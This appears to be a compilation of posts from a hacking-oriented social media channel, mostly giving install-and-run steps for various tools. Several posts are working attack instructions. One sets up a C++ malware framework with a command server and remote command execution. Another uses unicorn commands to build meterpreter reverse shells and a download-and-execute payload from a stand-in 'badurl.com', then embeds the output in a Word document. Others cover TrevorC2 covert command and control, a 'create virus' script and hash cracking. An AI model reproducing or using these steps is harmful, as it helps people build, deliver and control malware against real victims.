—————𝖀𝖓D𝖊𝖗𝕮𝖔D𝖊—————

🦑HOW TO check Packet Injection capabilities in all connected wireless cards
T.me/UndercOdeTestingOfficial

🦑Dependencies

1) aircrack-ng::: Install it by executing following command as root in terminal

>apt install aircrack-ng
awk ::: Install it by running following comand as root in terminal

2) apt install gawk
Note : gawk is already installed on most linux distributions

🦑Supported distros--> All Debian based, Ubuntu, Fedora, Kali, Arch, OpenSUSE.

🦑INSTALLISATION:

1) Download the master zip and extract all files to any location.

https://github.com/Enixes/Injectorist

2) Open terminal and navigate to extracted folder

3) cd /location/of/extraction

4) Gain root access
su Enter root password:____

5)Make the script InjectionCheck executable by-

6)chmod +x InjectionCheck

7)Run the script
./InjectionCheck

8) Now, Injectorist will scan all wireless cards connected for packet injection

@ STEAVE(KL.)
——————𝖀𝖓D𝖊𝖗𝕮𝖔D𝖊—————-

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Install Ubanto On Android Without Root New 2019
t.me/UnderCodeTestingOfficial

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

open Termux and Type :
1) apt update

2) apt upgrade

3) apt install git wget proot -y

4) git clone https://github.com/htr-tech/ubuntu

5) cd ubuntu

6) chmod +x ubuntu.sh

7) bash ubuntu.sh

🦑ALL In one Command:

> apt update && apt install git wget proot -y && git clone https://github.com/htr-tech/ubuntu && cd ubuntu && chmod +x ubuntu.sh && bash ubuntu.sh

8) Start ubuntu

> bash start.sh

9) Exit ubuntu

> logout

🦑Tested

M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HOW ADD NEW BRIDGE TO TOR BROWSER TESTED
instagram.com/UNderCodeTestingCompany

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃


1) Once the bridge is running, find its bridge line. For obfs4, the bridge line is in the file <datadir>/pt_state/obfs4_bridgeline.txt.

2) You need to insert the external IP/port, and the fingerprint from the file <datadir>/fingerprint.

3) File a new ticket that contains the bridge line.
Component: Applications/Tor Browser
Keywords: tbb-bridges

4) Make a pull request at ​https://github.com/OpenObservatory/ooni-resources that adds the new bridge's IP/port to the file bridge_reachability/tor-bridges-ip-port.csv. (This will cause OONI to start testing the reachability of the new bridge.)

Thats all!

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm)
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WHAT IS A WARM MALWARES/VIRUS ?
t.me/UndercOdeTestingOfficial

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1) A worm virus is a malicious, self-replicating program that can spread throughout a network without human assistance.

2) Worms cause damage similar to viruses, exploiting holes in security software and potentially stealing sensitive information, corrupting files and installing a back door for remote access to the system, among other issues.

3) Worms often utilize large amounts of memory and bandwidth, so affected servers, networks and individual systems are often overloaded and stop responding.

4) worms are not exactly a viruses. Viruses need a host computer or operating system. The worm program operates alone.

5) The worm is often transmitted via file-sharing networks, information-transport features, email attachments or by clicking links to malicious websites. Once downloaded, the worm takes advantage of a weakness in its target system or tricks a user into executing it. Some worms have a phishing component that entices users to run the malicious code.

6) Internet worms are often designed to exploit new security issues, and search for systems that haven’t installed current software or operating system security updates.

7) Classifications and names of worms include:

> Email-Worm

> IM-Worm

> IRC-Worm

> Net-Worm

> P2P-Worm

@ M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 EternalRocks worm(virus ) BREAKED WINDOWS HACK TOOL
> MicroBotMassiveNet
instagram.com/UndercOdeTestingCompany
> It spreads through public (The Shadow Brokers NSA dump) SMB exploits: ETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE and ETERNALSYNERGY, along with related programs: DOUBLEPULSAR, ARCHITOUCH and SMBTOUCH.

» taskhost.exe properties

> First stage malware UpdateInstaller.exe (got through remote exploitation with second stage malware) downloads necessary .NET components (for later stages) TaskScheduler and SharpZLib from Internet, while dropping svchost.exe (e.g. sample) and taskhost.exe (e.g. sample). Component svchost.exe is used for downloading, unpacking and running Tor from archive.torproject.org along with C&C ( ubgdgno5eswkhmpy. onion) communication requesting further instructions (e.g. installation of new components).

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) Downloading required .NET components (first stage)

> http://api.nuget.org/packages/taskscheduler.2.5.23.nupkg

> http://api.nuget.org/packages/sharpziplib.0.86.0.nupkg # in newer variants

2) Appendix

> Decompilation of an older sample

C# source # 1ee894c0b91f3b2f836288c22ebeab44798f222f17c255f557af2260b8c6a32d

3) Globals

> Network traffic capture (PCAP)

4) Windows 7 x64 SP1 Honeypot # initial exploitation capture ]

5) Yara rules

> EternalRocks.yara

🦑 Debug strings

> C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB

> C:\Users\tmc\Documents\DownLoader\Project1.vbp

> C:\Users\tmc\Documents\TorUnzip\Project1.vbp

> c:\Users\tmc\Documents\Visual Studio 2015\Projects\MicroBotMassiveNet\taskhost\obj\x86\Debug\taskhost.pdb

> C:\Users\tmc\Documents\Visual Studio 2015\Projects\WindowsServices\svchost\bin\svchost.pdb

6) Now Download .zip file

> https://github.com/stamparm/EternalRocks/archive/master.zip

🦑File paths

> c:\Program Files\Microsoft Updates\

> Scheduled tasks

> ServiceHost -> C:\Program Files\Microsoft Updates\svchost.exe # system start, log on, daily

> TaskHost -> C:\Program Files\Microsoft Updates\taskhost.exe # system start, log on, daily

@ M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Framework for building Windows malware written in C++ 2019 new release //
> Virus/ Worms /Bot / Spyware/ Keylogger/ Scareware
>Richkware is a library of network and OS functions, that you can use to create malware. The composition of these functions permits the application to assume behaviors referable to the following types of malware
t.me/UndercOdeTestingCompany


🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/richkmeli/Richkware

2) cd Richware

3) Open main.cpp, and create an instance of Richkware.

4) With Richkware-Manager-Server

If you have deployed RMS, you can initialize the malware as follows:

int main() {
Richkware richkware("Richk","DefaultPassword","192.168.99.100", "8080", "associatedUser");
...
return 0;
}

5) Otherwise, if you haven't deployed RMS, you can use:

Richkware richkware("Richk","richktest");

in this way, it uses "richktest" as encryption key.


> ( Using MinGW for Windows or MinGW cross compiler for Linux build environment

make)

6) Compiling :

Using Microsoft C++ compiler (Visual Studio)

> C/C++ > Preprocessor > Preprocessor Definitions, add

> "_CRT_SECURE_NO_WARNINGS"
Linker > Input > Additional Dependencies, add "Ws2_32.lib"

7) Remotely Command Execution

Call framework function StartServer in the main, it starts server on a port, in the following example is the TCP port 8000. Remember that if a port is already used by another program, you can't use that port, until the program will be stopped.

int main () {
...
richkware.network.server.Start("8000");
...
}
8)Connect using terminal in Unix systems

In Unix systems, you can use netcat, and run the following command:

nc <serverName> 8000

9) Connect using terminal in Windows

In Windows, you can use telnet, in the same way:

> telnet <serverName> 8000

🦑E N J O Y

WRITTEN BY M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Install ADB & FastBoot Tools in Termux!
2019
t.me/UndercOdeTestingOfficial

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

A) Silent installation:

1) Copy and paste the following command in Termux to silently install Tools:

> apt update > /dev/null 2>&1 && apt --assume-yes install wget > /dev/null

2) wget https://github.com/MasterDevX/Termux-ADB/raw/master/

3) InstallTools.sh -q && bash InstallTools.sh

B) Common installation:

1) Copy and paste the following command in Termux to install Tools with logs output:

> apt update && apt install wget && wget https://github.com/MasterDevX/Termux-ADB/raw/master/InstallTools.sh && bash InstallTools.sh

🦑Tested

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm)
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How To Compress / Decompress Brawl Stars SC files on Windows / Linux / Android!
instagram.com/UnderCodeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

> On Windows:

1) Download Python 3.5 or newer version from official page.
>https://www.python.org/downloads/

2) Install Python. While Installing, enable such parameters as "Add Python to PATH", "Install pip", "Install py launcher", "Associate files with Python" and "Add Python to environment variables".

3) Download XCoder from releases page and extract it.
> https://github.com/MasterDevX/XCoder/releases

4) Execute "Init.py" file to install required modules and create workspace directories.

🦑On Linux:

1) Open Terminal and install Python by executing following command:

2) sudo apt-get update && sudo apt-get install python3 python3-pip

3) Download XCoder from releases page and extract it.
> https://github.com/MasterDevX/XCoder/releases

4) Execute "Init.py" file to install required modules and create workspace directories.

🦑 On Android:

1) Download and install PyDroid app from Google Play.
> https://play.google.com/store/apps/details?id=ru.iiec.pydroid3

2) Open PyDroid and wait until Python installs.

3) Download XCoder from releases page and extract it.
> https://github.com/MasterDevX/XCoder/releases


4) In PyDroid open and execute "Init.py" file to install required modules and create workspace directories.


🦑 How to use

> To compile SC:

1) Put folders with texture name and .png files inside them in the "In-Decompressed-SC" directory and execute "SC-Encode.py" script. After the process will be finished, your .sc files will appear in "Out-Compressed-SC" folder.

2) To decompile SC:

> Put .sc files in the "In-Compressed-SC" directory and execute "SC-Decode.py" script. After the process will be finished, your .png files will appear in "Out-Decompressed-SC" folder.

🦑Tested By undercOde

> win server essentiel

> android 8.0

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm)
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 WIN32/SIREFEF VIRUS i just to test now this Virus & his effect on windows in UndercOde i declare:
t.me/UndercOdeTestingOfficial

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

> This family of malware uses stealth to hide its presence on your PC. Trojans in this family can do different things, including:

1) Downloading and running other files

2) Contacting remote hosts

3) Disabling security features

4) Members of the family can also change search results, which can generate money for the hackers who use Sirefef.

> Variants of Win32/Sirefef might be installed by other malware, including variants of the Trojan:Win32/Necurs family.

5) This kind on Virus dangerous can t be removed easly

> in addiction anti-virus apps detect and remove whole file
can t be remove from those files by anti-virus apps

Written by Steaven
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How Create Virus on Termux/Linux Without root - simple example
instagram.com/UndercodeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) apt update && apt upgrade

2) apt install git

3) apt install python && apt install python2

4) git clone https://github.com/TheReaper167/Malicious

5) cd Malicious

6) pip2 install -r requirements.txt

7) pip2 install requests

8) python2 malicious.py

9) after download virus open your file explorer

10) p find folder Malicious and open it

11) chose and open folder Android if you download virus Android

M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Automate Cracking
For Linux & root termux
t.me/UndercOdeTestingOfficial

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) mkdir -p hashcat/deps

2) git clone https://github.com/KhronosGroup/OpenCL-Headers.git

3) hashcat/deps/OpenCL

4) cd hashcat/

5) make

6) make install

7) python wordlist_optimizer.py <input file list> <output directory>

8) python wordlist_optimizer.py wordlists.txt ../optimized_wordlists

9) hashcat --help |grep -i ntlm
5500 | NetNTLMv1 | Network protocols
5500 | NetNTLMv1 + ESS | Network protocols
5600 | NetNTLMv2 | Network protocols
1000 | NTLM | Operating-Systems

🦑Features :

(1) Quick Crack
(2) Extensive Pure_Hate Methodology Crack
(3) Brute Force Attack
(4) Top Mask Attack
(5) Fingerprint Attack
(6) Combinator Attack
(7) Hybrid Attack
(8) Pathwell Top 100 Mask Brute Force Crack
(9) PRINCE Attack
(10) YOLO Combinator Attack
(11) Middle Combinator Attack
(12) Thorough Combinator Attack
🦑Tested by UndercOde On:

> Ubanto

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 New release 2019 in tool for using a PowerShell downgrade attack and inject shellcode straight into memory
> you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack
> use for learning only
instagram.com/UndercOdeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/trustedsec/unicorn

2) cd unicorn

3) python unicorn.py

4) Commands :

> python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>

> PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443

> PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe

> Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro

> Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro

> Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro

> HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta

> HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta

> HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta

> DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde

>CRT Example: python unicorn.py <path_to_payload/exe_encode> crt

>Custom PS1 Example: python unicorn.py <path to ps1 file>

> Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500

> Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)

>Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
Help Menu: python unicorn.py --help

🦑 to apply the payload :

1) Open Word

2) Insert tab -> Quick Parts -> Field

3) Choose = (Formula) and click ok.

4) Once the field is inserted, you should now see "!Unexpected End of Formula"

5) Right-click the Field, choose "Toggle Field Codes"

6) Paste in the code from Unicorn

7) Save the Word document.

E N J O Y
@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑TrevorC2 - Command and Control via Legitimate Behavior over HTTP
instagram.com/UndercOdeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/trustedsec/trevorc2

2) cd trevorc2

3) pip install -r requirements.txt

4) trevor2_server.py

> to edit the file first, and customize, what website you want to clone, etc. The server will clone a website of your choosing and stand up a server. This server is browsable by anyone and looks like a legitimate website. Contained within the source is parameter that (again is configurable), which contains the instructions for the client. Once a client connects, it searches for that parameter, then uses it to execute commands.

5) trevor2_client.py

> all you need in any configurable option is the ability to call out to a website, parse some basic data, and then execute a command and then put the results in a base64 encoded query string parameter to the site. That's it, not hard.

6) trevor2_client.ps1

> powershell implementation of trevor2_client.py, this allows you to use native PowerShell to interact with Trevor2_Server.

🦑Dockerfile:

1) git clone https://github.com/trustedsec/trevorc2.git

2) cd trevorc2
# At this point, setting up docker-machine to remotly deploy works great

3) docker build -t trevorc2 .

4) docker run -it -p 80:80 -p 443:443 trevorc2

USE FOR LEARN ONLY

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Test WPA3 using virtual Wi-Fi interfaces
t.me/undercOdeTestingOfficial

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/vanhoefm/hostap-wpa3

2) cd hostapd-wpa3

3) cp defconfig .config

4) make -j 2

5) cd ..

6) now for wpa_supplicant:

> cd wpa_supplicant

7) cp defconfig .config

8) make -j 2

9) sudo modprobe mac80211_hwsim radios=3

> rfkill unblock wifi

`10) Optionally kill other Wi-Fi clients the brute-for way:

> sudo pkill wpa_supplicant

11) Open a new terminal, and in the directory hostapd execute:

> sudo ./hostapd hostapd_wpa3.conf -dd -K

12) Open another terminal, and in the directory wpa_supplicant execute:

> sudo ./wpa_supplicant -D nl80211 -i wlan1 -c supp_wpa3.conf -dd -K

Written by M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑IP Spoofing FULL :

The term IP (Internet Protocol) address spoofing refers to the creation of IP packets with a forged (spoofed) source IP address with the purpose of concealing the identity of the sender or impersonating another computing system.
T.me/UnderCodeTestingOfficial

🦑Why it works ?
IP-Spoofing works because trusted services only rely on network address based authentication. Since IP is easily duped, address forgery is not difficult.
The main reason is security weakness in the TCP protocol known as sequence number prediction.

🦑How it works ?
To completely understand how ip spoofing can take place, one must examine the structure of the TCP/IP protocol suite. A basic understanding of these headers and network exchanges is crucial to the process.

🦑Internet Protocol (IP) :
It is a network protocol operating at layer 3 (network) of the OSI model. It is a connectionless model, meaning there is no information regarding transaction state, which is used to route packets on a network. Additionally, there is no method in place to ensure that a packet is properly delivered to the destination.

> Examining the IP header, we can see that the first 12 bytes (or the top 3 rows of the header) contain various information about the packet. The next 8 bytes (the next 2 rows), however, contains the source and destination IP addresses. Using one of several tools, an attacker can easily modify these addresses – specifically the “source address” field.

🦑Transmission Control Protocol (TCP) :
It is the connection-oriented, reliable transport protocol in the TCP/IP suite. Connection-oriented simply means that the two hosts participating in a discussion must first establish a connection via the 3-way handshake (SYN-SYN/ACK-ACK). Reliability is provided by data sequencing and acknowledgement. TCP assigns sequence numbers to every segment and acknowledges any and all data segments recieved from the other end.


> As you can see above, the first 12 bytes of the TCP packet, which contain port and sequencing information.

> TCP sequence numbers can simply be thought of as 32-bit counters. They range from 0 to 4,294,967,295. Every byte of data exchanged across a TCP connection (along with certain flags) is sequenced. The sequence number field in the TCP header will contain the sequence number of the *first* byte of data in the TCP segment. The acknowledgement number field in the TCP header holds the value of next *expected* sequence number, and also acknowledges *all* data up through this ACK number minus one.

> TCP packets can be manipulated using several packet crafting softwares available on the internet.

🦑The Attack
IP-spoofing consists of several steps. First, the target host is choosen. Next, a pattern of trust is discovered, along with a trusted host. The trusted host is then disabled, and the target's TCP sequence numbers are sampled. The trusted host is impersonated, the sequence numbers guessed, and a connection attempt is made to a service that only requires address-based authentication. If successful, the attacker executes a simple command to leave a backdoor.

> Spoofing can be implemented by different ways as given below -

🦑Non-Blind Spoofing :- This type of attack takes place when the attacker is on the same subnet as the victim. The sequence and acknowledgement numbers can be sniffed, eliminating the potential difficulty of calculating them accurately.

🦑Blind Spoofing :- Here the sequence and acknowledgement numbers are unreachable. In order to circumvent this, several packets are sent to the target machine in order to sample sequence numbers.

🦑Usage :


IP spoofing is almost always used in what is currently one of the most difficult attacks to defend against – Denial of Service attacks, or DoS.

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm)

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ITWSV- Integrated Tool for Web Security Vulnerability.
ITWSV is automated penetration testing tool which performs information gathering, auditing and reporting.
Instagram.com/UndercodeTestingCompany


🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/penetrate2hack/ITWSV.git

2) cd ITWSV

3) chmod +x start.sh

4) chmod +x update.sh (only if required)

5) ./start.sh

🦑FEATURES :
• WHOIS
• DNSWALK
• FIERCE
• DNSRecon
• DNSenum
• NMAP
• DMitry
• theHarvester
• LBD
• SSLScan
• SSLYze
• WhatWeb
• Automater
• Grabber
• Parsero
• Uniscan
• Metagoofil
• A2SV
• WPScan
• Droopescan
• WPSeku
• XssPy
• Spaghetti
• sublist3r
• WAFW00F
• nslookup
• nslookup
• dirsearch
• OWASP Joomscan
• Spaghetti
• Globuster
• Grabber

🦑TESTED ON :

> PARROT

> DEBIAN

> KALI


@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to be completely anonymous online by undercOde:
t.me/UndercOdeTestingOfficial

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1) use a fake mac adress for your wlan card

2) use your linux or windows in vm machine

3) use unonsurf tool (vpn+tor server and much more)

>git clone https://github.com/Und3rf10w/kali-anonsurf

> cd kali-anonsurf

> ./installer.sh

4) use proxies

5) make sure you have lastest updates installed on your system

6) never maximize any browser

7) Never think you can be anonymous on rooted- or non rooted phone😆

! well done

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁